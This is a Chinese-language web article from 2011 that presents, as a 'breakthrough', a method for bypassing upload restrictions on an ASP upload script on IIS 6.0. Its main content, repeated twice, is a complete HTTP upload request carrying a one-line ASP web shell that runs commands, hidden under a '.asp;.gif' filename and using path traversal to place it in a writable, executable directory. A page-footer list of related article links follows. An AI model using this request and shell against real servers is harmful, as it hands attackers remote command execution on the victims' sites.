upfile asp文件上傳 又一奇跡般的突破
發(fā)布時間:2011-04-01 01:06:01 作者:佚名
我要評論

不知道各位。在上傳的時候。 有沒需要過。 一個上傳。 不修改名字。。然后上傳目錄已經(jīng)被程序所定義了。
然而。上傳目錄取消了腳本執(zhí)行的權(quán)限。 我想這里估計大家都要放棄了。
如何突破呢?其實是可以的. 關(guān)鍵是 [不修改名字]
先來看看一個上傳的數(shù)據(jù)包:
POST /fa-bu/upload/upfile1.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://xxxxx/fa-bu/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: xxx.xxxx.xxnet
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
-----------------------------7da290150c5e
Content-Disposition: form-data; name="act"
upload
-----------------------------7da290150c5e
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
Content-Type: text/plain
<%execute(request("cmd"))%>
-----------------------------7da290150c5e
Content-Disposition: form-data; name="Submit"
up
-----------------------------7da290150c5e--
關(guān)鍵是 :
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
我首先呢。 filename他是如何判斷 那個開始就是文件名呢? 他是判斷filename里的最右邊的一個"\"以后的就是文件名字了。
大家因該知道。 在windows下 "\" 和 "/" 是不分家的。
假設(shè)上傳之后的目錄為upload/
然后一個可以執(zhí)行可以寫的目錄為 okokok/
那么我們只要構(gòu)造
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif"
那么我們上傳的文件就成功的傳進(jìn)去了 okokok/111.asp;.gif了。
突破之!
PS: win+iis6.0測試成功。
如何突破呢?其實是可以的. 關(guān)鍵是 [不修改名字]
先來看看一個上傳的數(shù)據(jù)包:
POST /fa-bu/upload/upfile1.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://xxxxx/fa-bu/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: xxx.xxxx.xxnet
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
-----------------------------7da290150c5e
Content-Disposition: form-data; name="act"
upload
-----------------------------7da290150c5e
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
Content-Type: text/plain
<%execute(request("cmd"))%>
-----------------------------7da290150c5e
Content-Disposition: form-data; name="Submit"
up
-----------------------------7da290150c5e--
關(guān)鍵是 :
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
我首先呢。 filename他是如何判斷 那個開始就是文件名呢? 他是判斷filename里的最右邊的一個"\"以后的就是文件名字了。
大家因該知道。 在windows下 "\" 和 "/" 是不分家的。
假設(shè)上傳之后的目錄為upload/
然后一個可以執(zhí)行可以寫的目錄為 okokok/
那么我們只要構(gòu)造
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif"
那么我們上傳的文件就成功的傳進(jìn)去了 okokok/111.asp;.gif了。
突破之!
PS: win+iis6.0測試成功。
相關(guān)文章
- 本文檔主要講述的是HTML5表單新特征簡介與舉例;希望本文檔會給有需要的朋友帶來幫助;感興趣的朋友可以過來看看2017-04-10
- 這篇文章主要介紹了HTML5的新特性,需要的朋友可以參考下的相關(guān)資料2016-03-03
- 這篇文章主要介紹了HTML5新特性之用SVG繪制的微信logo 的相關(guān)資料,需要的朋友可以參考下2016-02-03
- 本篇文章給大家分享html5一些有趣的新特征,非常實用,對html5新特征感興趣的朋友一起學(xué)習(xí)吧2015-12-01
HTML中文件上傳時使用的<input type="file">元素的樣式自定義
這篇文章主要介紹了HTML中文件上傳時使用的<input type="file">元素的樣式自定義的相關(guān)資料,非常不錯,具有參考借鑒價值,需要的朋友可以參考下2016-06-29- 文件上傳input在各個瀏覽器里表現(xiàn)形式都不一樣,這里通過css樣式控制,盡量在多瀏覽器中的表現(xiàn)都一樣2013-01-10
用Jquery實現(xiàn)大文件上傳 Jquery Large File Upload v10.32.0
jQuery File Upload 是一個 jQuery 圖片上傳組件,支持多文件上傳、取消、刪除,上傳前縮略圖預(yù)覽、列表顯示圖片大小,支持上傳進(jìn)度條顯示2021-10-05- 需要在要目錄下新建兩個目錄:upfile和upimg 添加一個FileUpload控件.一個Button.一個Image.一個Label 關(guān)鍵代碼: string name = FileUpload1.FileName;//獲得上傳文件2008-12-17
- 這篇文章主要介紹了HTML5新特性之type=file文件上傳功能,需要的朋友可以參考下2018-02-02